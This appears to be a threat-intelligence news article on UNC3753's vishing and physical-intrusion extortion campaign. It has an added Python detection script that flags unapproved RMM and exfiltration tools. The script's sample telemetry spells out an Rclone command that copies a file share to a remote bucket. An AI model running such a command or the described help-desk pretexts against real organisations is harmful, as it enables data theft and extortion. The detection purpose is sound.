UNC3753 Accelerates U.S. Data Theft Extortion Campaign Through Vishing and Physical Intrusions
Cybersecurity researchers have revealed a troubling trend in data theft extortion campaigns targeting various sectors, including professional, legal, and financial services in the United States. Between January and May 2026, these attacks have been linked to a threat actor known as UNC3753, also referred to as Chatty Spider, Luna Moth, and the Silent Ransom Group (SRG).
The Modus Operandi of UNC3753
According to findings from Google Mandiant and the Google Threat Intelligence Group (GTIG), UNC3753 employs voice phishing, or vishing, along with social engineering tactics to gain unauthorized access to corporate networks. The researchers, including Chad Reams, Tufail Ahmed, Keith Knapp, Ashley Frazer, and Tyler McLellan, noted that the group often initiates contact through phone calls, posing as IT support personnel. They use pretexts such as data migration or invoice-related inquiries to persuade targets into hosting screen-sharing sessions and downloading remote monitoring and management (RMM) tools.
Once access is granted, attackers either conduct direct searches for sensitive files or manipulate victims into executing actions that facilitate data exfiltration. The types of stolen information include proprietary legal documents, personally identifiable information (PII), and financial records.
Physical Intrusions and Escalation of Tactics
In a notable escalation of tactics, some attackers have physically infiltrated corporate offices, echoing recent advisories from the U.S. Federal Bureau of Investigation (FBI). These intrusions involve impersonating IT technicians to gain access to systems and using removable USB drives for data theft. The FBI highlighted that this approach enables attackers to exfiltrate data directly from the victim’s computer.
The group has demonstrated a capacity for sophisticated operations, with the FBI stating, “By sending someone in-person to the victim’s location to facilitate the intrusion, SRG actors exfiltrate data to an external hard drive or USB drive inserted by the threat actor into the victim’s computer.”
Tactical Overlaps with Other Threat Groups
Google’s analysis indicates that UNC3753 shares tactical similarities with another threat cluster, UNC2686, which has been previously associated with BazarCall-style phishing campaigns. Although UNC3753 has been known to deploy LockBit Black ransomware, its primary focus since 2022 has shifted toward extortion-only operations, pressuring victims to comply with ransom demands or face the public release of their data on the LEAKEDDATA site.
Both UNC3753 and UNC2686 are considered offshoots of the now-defunct Conti ransomware gang. Early iterations of their campaigns included subscription cancellation lures as part of callback phishing attacks aimed at installing remote access software on victims’ machines.
Exploiting Communication Platforms
Beginning around March 2025, UNC3753 has been observed impersonating internal corporate IT help desk staff to lure victims into screen-sharing sessions on platforms like Zoom, Microsoft Teams, or Quick Assist. This strategy effectively circumvents traditional security measures.
The threat group often initiates campaigns with benign, invoice-themed emails sent from consumer email accounts controlled by the attackers. These emails typically lack active links or malicious attachments, serving primarily to establish a pretext that raises the target’s internal security concerns, making them more susceptible to follow-up voice calls.
Once a screen-sharing session is established, attackers guide victims to install legitimate remote desktop software such as AnyDesk, Bomgar, SuperOps RMM, or Zoho Assist. Instructions for installation are often shared through a legitimate service called “privnote.com,” which allows users to send self-destructing notes.
Data Exfiltration and Extortion Demands
UNC3753 has also been documented establishing Zoom sessions directly on victims’ personal laptops to access corporate virtual desktop infrastructure (VDI). This allows them to delve deeper into corporate file systems, enumerating local and cloud directories and harvesting data from sensitive folders, including those related to tax filings, audits, client agreements, and Social Security numbers (SSNs).
In the final stages of their operation, captured data is transmitted to the attackers using tools like WinSCP or Rclone, or through email addresses controlled by the threat actors. Following this, victims receive extortion demands via email, typically within 30 minutes of the attackers exiting the target environment. These emails impose a three-day deadline for ransom negotiations and threaten to contact employees and clients directly if the victims do not respond. Additionally, they warn of publishing the stolen information on data leak sites.
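The tooling named in the two preceding sections (victim-installed RMM software such as AnyDesk, Bomgar, SuperOps RMM or Zoho Assist, followed by WinSCP or Rclone for exfiltration) is observable in endpoint process-creation telemetry. The following is an added detection example, not code from the report or from Google; the product substrings, the user-writable path heuristic and the single-tool allow-list are this example's assumptions, and the sample events are constructed.

```python
from dataclasses import dataclass

# Product names come from the report above; matching them as case-insensitive
# substrings of the image path is this example's assumption, not a vendor-documented
# executable name. APPROVED_RMM is a constructed placeholder for an org's sanctioned tool.
RMM_MARKERS = ("anydesk", "bomgar", "superops", "zohoassist", "zoho assist")
EXFIL_MARKERS = ("rclone", "winscp")
APPROVED_RMM = {"bomgar"}
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\downloads\\")

@dataclass
class ProcEvent:
    ts: str
    user: str
    image: str      # full path of the started process
    cmdline: str
    parent: str     # image path of the parent process

def _match(text, markers):
    low = text.lower()
    return next((m for m in markers if m in low), None)

def detect(events):
    """Return (ts, user, rule, detail) tuples for events matching the vishing-to-exfil flow."""
    out = []
    for e in events:
        rmm = _match(e.image, RMM_MARKERS)
        if rmm and rmm not in APPROVED_RMM:
            # A victim-installed RMM usually lands in a user-writable path, not Program Files
            where = "user-writable path" if _match(e.image, USER_WRITABLE) else "system path"
            out.append((e.ts, e.user, "unapproved_rmm", f"{rmm} ({where}) parent={e.parent}"))
        if _match(e.image, EXFIL_MARKERS):
            out.append((e.ts, e.user, "exfil_tool", e.cmdline))
    return out

# Constructed telemetry modelled on the sequence in the report (not real logs).
SAMPLE = [
    ProcEvent("10:02", "CORP\\jsmith", r"C:\Users\jsmith\Downloads\AnyDesk.exe", "AnyDesk.exe",
              r"C:\Program Files\Google\Chrome\chrome.exe"),
    ProcEvent("10:05", "CORP\\jsmith", r"C:\Program Files\Bomgar\bomgar-scc.exe", "bomgar-scc.exe",
              r"C:\Windows\System32\services.exe"),
    ProcEvent("10:41", "CORP\\jsmith", r"C:\Users\jsmith\AppData\Local\Temp\rclone.exe",
              r"rclone.exe copy \\fs01\Clients remote:bucket", r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for ts, user, rule, detail in detect(SAMPLE):
        print(f"{ts} {user} {rule}: {detail}")
```

The sanctioned Bomgar launch is deliberately not flagged, so the rule reports only the user-downloaded RMM and the Rclone copy; in a real deployment the markers would be matched against signed-binary metadata rather than file names alone.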
High-Value Targets and the Human Element
Legal services firms are particularly attractive targets for extortion actors due to their repositories of sensitive client transaction files, merger and acquisition plans, trade secrets, and regulatory reports. The threat actors understand that legal entities face significant reputational and regulatory risks, motivating them to resolve extortion situations discreetly.
The use of voice-guided social engineering tactics allows these groups to bypass robust technical defenses, web security gateways, and multi-factor authentication configurations. This highlights the ongoing challenge organizations face in securing their environments against increasingly sophisticated and human-centric attack vectors.